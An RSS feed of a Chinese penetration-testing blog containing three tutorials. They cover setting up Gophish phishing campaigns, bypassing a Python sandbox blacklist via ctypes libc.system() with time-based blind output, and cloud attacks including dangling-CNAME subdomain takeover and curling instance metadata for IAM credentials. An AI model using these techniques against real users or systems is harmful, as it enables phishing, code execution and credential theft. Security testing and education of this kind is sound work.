<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>docs on kiiy&#39;s blog</title>
		<link>https://kiiy.cn/docs/</link>
		<description>Recent content in docs on kiiy&#39;s blog</description>
		<generator>Hugo</generator>
		<language>zh-cn</language>
		
		
		
		
			<atom:link href="https://kiiy.cn/docs/index.xml" rel="self" type="application/rss+xml" />
			<item>
				<title></title>
				<link>https://kiiy.cn/docs/gophish%E9%92%93%E9%B1%BC%E6%8C%87%E5%8D%97/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://kiiy.cn/docs/gophish%E9%92%93%E9%B1%BC%E6%8C%87%E5%8D%97/</guid>
				<description>&lt;h1 id=&#34;gophish钓鱼指南&#34;&gt;gophish钓鱼指南&lt;a class=&#34;anchor&#34; href=&#34;#gophish%e9%92%93%e9%b1%bc%e6%8c%87%e5%8d%97&#34;&gt;#&lt;/a&gt;&lt;/h1&gt;&#xA;&lt;h2 id=&#34;安装&#34;&gt;安装&lt;a class=&#34;anchor&#34; href=&#34;#%e5%ae%89%e8%a3%85&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;p&gt;首先是gophish的安装，简单不多说&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code class=&#34;language-url&#34; data-lang=&#34;url&#34;&gt;https://github.com/gophish/gophish/releases/&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;新建gophish目录，解压出来，里面有一个gophish可执行文件，给个执行权限&lt;/p&gt;&#xA;&lt;p&gt;然后编辑里面的config.json文件&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250704214900371.png&#34; alt=&#34;image-20250704214900371&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;gophish有两个server，一个是管理后台，3333端口，一个是用于搭建钓鱼页面的，80端口。端口冲突自行修改即可。&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-json&#34; data-lang=&#34;json&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;admin_server&amp;#34;&lt;/span&gt;: {&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;listen_url&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;0.0.0.0:3333&amp;#34;&lt;/span&gt;,    &lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;#把127.0.0.1修改为0.0.0.0&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;use_tls&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#66d9ef&#34;&gt;true&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;cert_path&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;gophish_admin.crt&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;key_path&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;gophish_admin.key&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;trusted_origins&amp;#34;&lt;/span&gt;: []&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        },&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;phish_server&amp;#34;&lt;/span&gt;: {&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;listen_url&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;0.0.0.0:80&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;use_tls&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#66d9ef&#34;&gt;false&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;cert_path&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;example.crt&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;key_path&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;example.key&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        },&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;db_name&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;sqlite3&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;db_path&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;gophish.db&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;migrations_prefix&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;db/db_&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;contact_address&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;logging&amp;#34;&lt;/span&gt;: {&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;filename&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;#34;&lt;/span&gt;,&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#f92672&#34;&gt;&amp;#34;level&amp;#34;&lt;/span&gt;: &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        }&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;模块讲解&#34;&gt;模块讲解&lt;a class=&#34;anchor&#34; href=&#34;#%e6%a8%a1%e5%9d%97%e8%ae%b2%e8%a7%a3&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;p&gt;搭建好后会有初始密码，ip+3333端口登录后台。&lt;/p&gt;&#xA;&lt;p&gt;一共有5个模块，具体作用如图&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250704220027053.png&#34; alt=&#34;image-20250704220027053&#34; /&gt;&lt;/p&gt;&#xA;&lt;h3 id=&#34;sending-profiles&#34;&gt;Sending Profiles&lt;a class=&#34;anchor&#34; href=&#34;#sending-profiles&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;首先来讲Sending Profiles&lt;/p&gt;&#xA;&lt;p&gt;注意这里有个大坑，SMTP From那里不要加前缀，如admin&amp;lt;12346789@qq.com&amp;gt;，不然qq和163识别不出来，几乎所有的文章都加了前缀，当时卡了半天，这个前缀在后面的模块中是可以加的。&lt;/p&gt;&#xA;&lt;p&gt;授权码需要去qq或者163申请，找到安全设置，看到SMTP无脑开通就行了，开通后会有一个授权码，一定要复制。&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250704220934179.png&#34; alt=&#34;image-20250704220934179&#34; /&gt;&lt;/p&gt;&#xA;&lt;h3 id=&#34;email-templates&#34;&gt;Email Templates&lt;a class=&#34;anchor&#34; href=&#34;#email-templates&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;接下来我们需要编辑钓鱼邮件了，除了自己写，还有一种就是导入邮件原文，可以模仿官方发送的邮件格式，效果更逼真。邮件原文可以直接查看。&lt;/p&gt;&#xA;&lt;p&gt;有一个需要注意的地方，在我们编辑钓鱼链接时，href的地址本来应该是钓鱼页面的地址，也就是Landing Pages的地址对吧？&lt;/p&gt;&#xA;&lt;p&gt;但是这里不用写，直接写一个{{.URL}}模板，在配置完Campaign后，gophish会自动帮我们填入。&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-html&#34; data-lang=&#34;html&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;&lt;span style=&#34;color:#f92672&#34;&gt;a&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;href&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;{{.URL}}&amp;#34;&lt;/span&gt;&amp;gt;点击跳转到钓鱼页面&amp;lt;/&lt;span style=&#34;color:#f92672&#34;&gt;a&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250704222042939.png&#34; alt=&#34;image-20250704222042939&#34; /&gt;&lt;/p&gt;&#xA;&lt;h3 id=&#34;landing-pages&#34;&gt;Landing Pages&lt;a class=&#34;anchor&#34; href=&#34;#landing-pages&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;注意在网址导入时，是不支持含有文件夹的，比如当你进入一个web页面，按ctrl+s保存网页时，保存下来的有html，也有文件夹，这种就不支持。仅支持保存下来就只有一个html代码的。&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250704223131179.png&#34; alt=&#34;image-20250704223131179&#34; /&gt;&lt;/p&gt;&#xA;&lt;h3 id=&#34;usergroups&#34;&gt;User&amp;amp;Groups&lt;a class=&#34;anchor&#34; href=&#34;#usergroups&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250706171515462.png&#34; alt=&#34;image-20250706171515462&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;在导入文件时注意，如果使用的是windows系统，你从gophish下载的模板文件默认编码是ASNI，在导入中文时会出现乱码，解决方案是你编辑好模板文件后，在保存时，选择UTF-8&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250706171840319.png&#34; alt=&#34;image-20250706171840319&#34; /&gt;&lt;/p&gt;</description>
			</item>
			<item>
				<title></title>
				<link>https://kiiy.cn/docs/python%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://kiiy.cn/docs/python%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF/</guid>
				<description>&lt;h1 id=&#34;python任意代码执行绕过姿势&#34;&gt;Python任意代码执行绕过姿势&lt;a class=&#34;anchor&#34; href=&#34;#python%e4%bb%bb%e6%84%8f%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e7%bb%95%e8%bf%87%e5%a7%bf%e5%8a%bf&#34;&gt;#&lt;/a&gt;&lt;/h1&gt;&#xA;&lt;p&gt;最近在项目测试实战中遇到了一个Python任意代码执行，本意是编写一段代码给到服务器执行，然后用来分析投资收益和财务情况，而每当这段python代码执行，服务器都会启动一个docker容器，并且容器与外部无法通信，只能执行系统命令，那说了这么多，shell那不是手到擒来？&lt;/p&gt;&#xA;&lt;p&gt;但是存在黑名单过滤，具体黑名单模块如下：&lt;/p&gt;&#xA;&lt;p&gt;[&amp;lsquo;os&amp;rsquo;, &amp;lsquo;platform&amp;rsquo;, &amp;rsquo;linecache&amp;rsquo;, &amp;lsquo;subprocess&amp;rsquo;, &amp;lsquo;builtins&amp;rsquo;, &amp;lsquo;requests&amp;rsquo;, &amp;lsquo;codecs&amp;rsquo;, &amp;lsquo;urllib&amp;rsquo;, &amp;lsquo;Popen&amp;rsquo;, &amp;rsquo;eval&amp;rsquo;, &amp;rsquo;exec&amp;rsquo;, &amp;lsquo;__builtins__&amp;rsquo;, &amp;lsquo;__import__&amp;rsquo;]&lt;/p&gt;&#xA;&lt;p&gt;可以看到os和subprocess模块已经被过滤，无法直接import执行命令&lt;/p&gt;&#xA;&lt;p&gt;eval和exec同样被过滤了，动态执行字符串代码这条路看样子也不太行&lt;/p&gt;&#xA;&lt;p&gt;动态导入__import__函数，requests http请求同样被过滤&lt;/p&gt;&#xA;&lt;p&gt;并且还存在一个问题，那就是没有回显，只返回执行时间，无法知道执行结果&lt;/p&gt;&#xA;&lt;p&gt;那如何解决这些问题呢？&lt;/p&gt;&#xA;&lt;h2 id=&#34;1ctypes的魔力&#34;&gt;1.ctypes的魔力&lt;a class=&#34;anchor&#34; href=&#34;#1ctypes%e7%9a%84%e9%ad%94%e5%8a%9b&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;p&gt;&lt;code&gt;ctypes&lt;/code&gt; 模块是 Python 中的一个标准库，用于与 C 语言编写的动态链接库（dll 、so或共享库）进行交互。它允许 Python 程序直接调用 C 库中的函数，并与它们传递数据。&lt;/p&gt;&#xA;&lt;p&gt;通过上面的解释我们可以发现，ctypes是可以调用系统动态链接库的，那么我们可以加载 Linux 的 C 标准库（&lt;code&gt;libc&lt;/code&gt;），代码如下图&lt;/p&gt;&#xA;&lt;p&gt;这段代码可以在大多数linux上执行&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; ctypes&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;# 获取 libc 库&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;libc &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; ctypes&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;CDLL(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;libc.so.6&amp;#34;&lt;/span&gt;)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;# 定义要执行的命令&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;command &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;b&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;ls&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;# 使用 libc 的 system 函数执行命令&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;libc&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;system(command)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;这段代码可以绕过上面的黑名单，但是还有一个问题便是没有回显&lt;/p&gt;&#xA;&lt;h2 id=&#34;2time的利用&#34;&gt;2.time的利用&lt;a class=&#34;anchor&#34; href=&#34;#2time%e7%9a%84%e5%88%a9%e7%94%a8&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;p&gt;当时我在思考如何回显时，突然想到了一个很类似的情况，sql blind time based，基于时间的sql盲注，仔细想想是不是很相似，也是通过时间返回来判断出回显数据。代码如下&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; ctypes&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; time&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;libc &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; ctypes&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;CDLL(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;libc.so.6&amp;#34;&lt;/span&gt;)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;command &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;b&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;id &amp;gt; /tmp/success 2&amp;gt;&amp;amp;1&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;libc&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;system(command)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;with&lt;/span&gt; open(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;/tmp/success&amp;#39;&lt;/span&gt;, &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;r&amp;#39;&lt;/span&gt;) &lt;span style=&#34;color:#66d9ef&#34;&gt;as&lt;/span&gt; f:&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    text &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; f&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;read()&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; ord(text&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;strip()[&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;]) &lt;span style=&#34;color:#f92672&#34;&gt;&amp;gt;&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;79&lt;/span&gt;: &lt;span style=&#34;color:#75715e&#34;&gt;#使用二分法&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    time&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;sleep(&lt;span style=&#34;color:#ae81ff&#34;&gt;10&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;这样我们就可以通过时间判断命令执行结果，我当时测试到这儿就结束了，觉得没有其他方法了&lt;/p&gt;</description>
			</item>
			<item>
				<title></title>
				<link>https://kiiy.cn/docs/%E4%BA%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AF%87/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://kiiy.cn/docs/%E4%BA%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AF%87/</guid>
				<description>&lt;h1 id=&#34;云安全学习篇&#34;&gt;云安全学习篇&lt;a class=&#34;anchor&#34; href=&#34;#%e4%ba%91%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%af%87&#34;&gt;#&lt;/a&gt;&lt;/h1&gt;&#xA;&lt;h2 id=&#34;oss&#34;&gt;OSS&lt;a class=&#34;anchor&#34; href=&#34;#oss&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;h3 id=&#34;权限配置&#34;&gt;权限配置&lt;a class=&#34;anchor&#34; href=&#34;#%e6%9d%83%e9%99%90%e9%85%8d%e7%bd%ae&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;oss存储桶有三种情况，一种是私有，需要id和key才能访问存储桶内的文件。另一种是公共读，即访问无限制，任何人可以访问。最后一种是公共读写，即任何人可以读和写，使用PUT方法即可上传任意文件&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250425143926982.png&#34; alt=&#34;image-20250425143926982&#34; /&gt;&lt;/p&gt;&#xA;&lt;p&gt;公共读还存在一个安全问题，即如果开启了ListObject，那么任何人都可以看到存储桶内的文件，以文件列表形式展示，类似目录遍历&lt;/p&gt;&#xA;&lt;h3 id=&#34;域名接管&#34;&gt;域名接管&lt;a class=&#34;anchor&#34; href=&#34;#%e5%9f%9f%e5%90%8d%e6%8e%a5%e7%ae%a1&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;一般来说存储桶不会解析像html这种文件，但是如果配置了域名绑定，也就是配置了CNAME，那么html就可以解析了，可以导致xss&lt;/p&gt;&#xA;&lt;p&gt;域名接管就是基于域名绑定CNAME的配置没有删除，只删除了存储桶&lt;/p&gt;&#xA;&lt;p&gt;举个例，比如你的oss地址是xxx.oss-cn-shenzhen.aliyuncs.com，此时你将images.aaa.com的域名绑定在了xxx.oss-cn-shenzhen.aliyuncs.com，也就是一条CNAME记录。之后你不想要这个存储桶了，于是删除了xxx.oss-cn-shenzhen.aliyuncs.com这个存储桶，但是你忘记删除CNAME记录了，也就是说此时images.aaa.com的域名还存在一条CNAME记录指向xxx.oss-cn-shenzhen.aliyuncs.com。&lt;/p&gt;&#xA;&lt;p&gt;此时攻击者就可以自己创建一个xxx.oss-cn-shenzhen.aliyuncs.com，名称相同的存储桶，此时他对该存储桶是有读写权限的，而你的域名images.aaa.com又恰好指向xxx.oss-cn-shenzhen.aliyuncs.com，这就造成了images.aaa.com子域名接管&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;攻击场景&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;像如果你发现一个oss存储桶出现NosuchBucket提示，说明可能会存在域名接管。&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://kiiy-images.oss-cn-beijing.aliyuncs.com/image-20250425192835763.png&#34; alt=&#34;image-20250425192835763&#34; /&gt;&lt;/p&gt;&#xA;&lt;h2 id=&#34;ecs&#34;&gt;ECS&lt;a class=&#34;anchor&#34; href=&#34;#ecs&#34;&gt;#&lt;/a&gt;&lt;/h2&gt;&#xA;&lt;h3 id=&#34;元数据&#34;&gt;元数据&lt;a class=&#34;anchor&#34; href=&#34;#%e5%85%83%e6%95%b0%e6%8d%ae&#34;&gt;#&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;元数据服务是一种提供查询运行中的实例内元数据的服务，简单来说就是云服务器可以通过访问元数据服务，来得到本机上的属性信息，同时，如果此时该实例存在RAM访问控制设置，也就是某个角色授权了该实例，那么就可以获得与该实例绑定角色的临时凭证，并通过该临时凭证获得云服务器的控制台权限，进而横向到其他机器。&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;阿里云元数据地址: http://100.100.100.200/&#xD;&#xA;腾讯云元数据地址: http://metadata.tencentyun.com/&#xD;&#xA;华为云元数据地址: http://169.254.169.254/&#xD;&#xA;亚马云元数据地址: http://169.254.169.254/&#xD;&#xA;微软云元数据地址: http://169.254.169.254/&#xD;&#xA;谷歌云元数据地址: http://metadata.google.internal/&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;通过访问元数据的 &lt;code&gt;/iam/security-credentials/&amp;lt;rolename&amp;gt;&lt;/code&gt; 路径可以获得目标的临时凭证，进而接管目标服务器控制台账号权限，前提是目标需要配置 IAM 角色才行，不然访问会 404&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-shell&#34; data-lang=&#34;shell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;curl http://169.254.169.254/latest/meta-data/iam/security-credentials&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://wiki.teamssix.com/img/1649996601.png&#34; alt=&#34;img&#34; 